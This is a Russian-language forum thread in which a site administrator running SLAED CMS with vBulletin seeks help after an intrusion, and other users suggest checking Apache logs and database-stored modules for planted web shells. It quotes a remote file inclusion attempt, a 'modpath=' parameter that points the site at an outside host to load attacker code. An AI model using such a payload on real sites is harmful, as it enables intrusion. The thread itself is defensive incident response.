Не знаю уж куда и запостить. Всё просмотрел - раздела безопасность или защита нету

CMC slaed 2.0 + vbulletin 3.62 DGT релиз + хак интеграции.
Через обратную связь пришло такое письмо:

Quote:

Развлекательно - варезный портал crack keygen скачать - Безопасность

Попытка взлома: Hack in GET - modpath = http://redeyes.altervista.org/guide.txt?
IP Адрес: 72.232.7.138
Пользователь: Guest
Ссылка: /index.php?modpath=http://redeyes.altervista.org/guide.txt?
Дата размещения: 05.04.07 - 20:29:29

На фтп появилась вот такая мп3
http://webfile.ru/1367548
Сравнение файлов со старых бекапов выявило некоторые несоответствия. Файлы которые различаются, я восстановил и залил на вебфайл
http://webfile.ru/1368305
Сравнение файлов так же показало, файлы различаются в основном форумные.
У кого будут какие предложения по защите?

Quote:

Originally Posted by dh_

У кого будут какие предложения по защите?

выбрасывай слеад 2,0 и интеграцию нахрен!!!
ставь адвансис

slaed 2.0 lite у меня стоит. Может это всё же через форум ломанули? Сейчас попробывал тоже самое запостить на mynuke.ru - не смог создать пост, изза ссылок, которые содержались в письме. И файлы различаются исключительно форумные.

а логи апача посмотреть не пробовал?

Quote:

Originally Posted by shpunsetoy

а логи апача посмотреть не пробовал?

Пробывал. Меня 1й раз ломают я незнаю что именно нужно искать. И их там много 5 метров. Логи я вылоожил на webfile. Размер в архиве - 500 килобайт. Если у кого возникнет желание помочь разобраться с логами, отпишитесь, или напишите в личку. Вышлю в личку ссылку. IP адреса 72.232.7.138 в логах не найдено.

Ща посмотрим.

Сломать могли что угодно, но приоритет здесь такой:
1. Интеграцию.
2. ЦМСку
3. Прочий человеческий фактор
4. vbulletin


index.php?modpath=...
Это индекс форума или сайта? Если форума, то проверь админка - модули и продукты - управление модулями, на предмет наличия левых модулей в которых может быть шелл.
Вообще проверь модули по любому - в них очень удобно шеллы встраивать т.к. все про них забывают и ищут дыру только в файлах.

А "изменения" в твоих файлах связано только с двумя причинами:
1. При заливке где-то добавил пробел
2. Был установлен Hide Hack =\

Три файла просмотрел, осталыные уже смотреть не охота т.к. вряд ил в них есть что-то интересно

Я может чтото не так понимаю? Какие модули нужно проверить? Я в тотал коммандере сравнил. - он сравнивает и по содержимому и где какие лишние файлы тоже показывает. Всё что различалось я выложил. А про Hide Hack я у второго админа спрошу. Может он устанавливал и мне не сказал.

админка- модули и продукты - управление модулями.
Эти. Во-первых проверь левые модули которые ты не устанавливал.
моудли храняться в базе а не в файлах. Тоталкоммандер никаким раком не заметит в них изменений.

В логах есть такое

Quote:

80.244.66.144 - - [07/Apr/2007:14:05:22 +0400] "GET /hacker.mp3 HTTP/1.1" 200 3996943 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"

/index.php?modpath= - незнаю откуда. Но месаги о попытках взлома шлёт slaed. Видимо там пробывали применить /index.php?modpath=
модули - установлены 2 хака

hide newpost_process
timeonboard newpost_process

только я когда залил старые файлы из бекапа, то эти хаки затёр.
А как их проверить?